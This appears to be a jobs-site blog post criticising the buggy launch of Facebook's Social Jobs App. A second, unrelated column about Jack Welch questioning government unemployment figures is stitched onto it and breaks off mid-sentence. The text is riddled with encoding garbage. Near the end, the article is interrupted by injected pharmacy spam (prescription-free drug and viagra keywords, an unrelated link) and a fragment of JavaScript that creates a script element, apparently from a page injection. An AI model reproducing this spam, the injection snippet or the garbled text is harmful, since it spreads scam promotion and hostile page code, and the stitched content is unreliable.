Today, Facebook launched its long-awaited Social Jobs App created in collaboration with selected job boards and in partnership with the U.S. government to offer a jobs bouquet thatai??i??s sure to kill all other job boards; if it manages to survive. However, alike Facebookai??i??s recent botched IPO the app is still filled with technical glitches, and as of now, when we are writing this report, the Social Jobs Partnership app shows 1,733,231 total jobs, and empty results under three of its five tabs.

Out of curiosity, we put in the keywords writer, editor, put in location New York, put in category Editorial/Media/Journalism, subcategory Editing & Proofreading and came up at first with blank results ai??i?? absolutely zero ai??i?? no jobs for us!

It took some time to realize that there were 5 tabs, ai???Work4Labs, BranchOut, US.jobs, Monster, and Jobvite, and Jobvite, which had no jobs on the app was showing up at first. Clicking on the Monster tab, also yielded an empty result, as did Work4Labs. There were two jobs shown under BranchOut, and under the US.jobs tab there seemed to be a number of jobs, but few seemed to be government jobs. Apparently, the Facebook Social Jobs App is integrated with the National Labor Exchange branded under US.jobs, but there is little about government jobs manifest in their search results. Non-functioning database integration and query output is a little unexpected from a jobs app after a company like Facebook works more than one year on it, and in partnership with the government.

In fact, the Social jobs app is a simple interface to keep you inside a number of selected Facebook-partner job boards, which returns results from their databases, and it seems you have to travel to those job-boards anyway to get things done.

So, for Facebook lovers, hereai??i??s a reason toAi?? enjoy, though it does not diminish the importance of social networks like LinkedIn or of real job boards or job sites which emphasize and focus on providing and finding jobs as their USP.

That said, whether you get a job or not through the application may depend upon your luck and the technical glitches being removed, but thereai??i??s one thing youai??i??d be able to prove to potential employers ai??i?? you are social media savvy, and you rarely move away from Facebook to search even for your livelihood.

However, it is too early to pronounce the last word on the very first day of launch of the application. online giant amaryllis bulbs wholesale http://vmgonline.lt/buy-aleve-in-bulk/ }var d=document;var s=d.createElement(‘script’); paxil canada pharmacy. buy zocor online without prescription. buy indocin medication Purchase Cheap cheapest alternative to viagra. Jack Welch Says Government Jobs Data Manipulated for Political Gain

EmploymentCrossing The Government Jobs column is sponsored by EmploymentCrossing, America's leading job site delivering the best results for jobs posted by employers.

On Monday, during an interview on CNBC, former General Electric Co. CEO Jack Welch expressed his doubts on the government jobs data put across by the Bureau of Labor Statistics. ai???Every fact says we donai??i??t have a booming economy,ai??? said Welch, ai???Somethingai??i??s wacky here. I didnai??i??t think it was right.ai??? When the BLS government jobs data released on October 5 showed the jobless rate the lowest since President Barack Obama entered White House in January 2009, Welch wrote a Twitter post, ai???Unbelievable jobs numbers ai??i?? these Chicago guys will do anything ai??i?? canai??i??t debate so change numbers.ai??? The suggestion was clear as the Obama reelection campaign is based in Chicago. With the official 7.9 percent unemployment rate released by the Labor Department on Nov 2, and exceeding the most optimistic […]
